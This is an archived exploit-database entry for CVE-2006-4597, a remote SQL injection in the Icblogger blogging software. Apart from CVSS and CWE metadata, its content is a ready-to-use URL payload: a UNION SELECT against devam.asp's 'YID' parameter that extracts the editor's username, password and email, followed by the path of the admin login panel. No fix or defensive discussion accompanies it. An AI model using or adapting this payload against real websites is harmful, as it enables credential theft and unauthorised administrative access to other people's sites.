Bug: Icblogger <= "YID" Remote Blind SQL Injection ( Ascii Version )

Search:
WLB2

Icblogger <= "YID" Remote Blind SQL Injection

Published
Credit
Risk
2006.09.08
ChironeX FleckeriX Gmail Com
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2006-4597
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

########################################################################
########

## ##

## Icblogger <= "YID" Remote Blind SQL Injection ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## Credit by | Chironex Fleckeri ##

## Mail | ChironeX.FleckeriX (at) Gmail (dot) Com [email concealed] ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## ##

########################################################################
########

########################################################################
########################################################################
##########################

#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT
null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #

########################################################################
########################################################################
##########################

#############################################################

#Admin Panel : http://www.target.com/path/admin/default.asp #

#############################################################

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version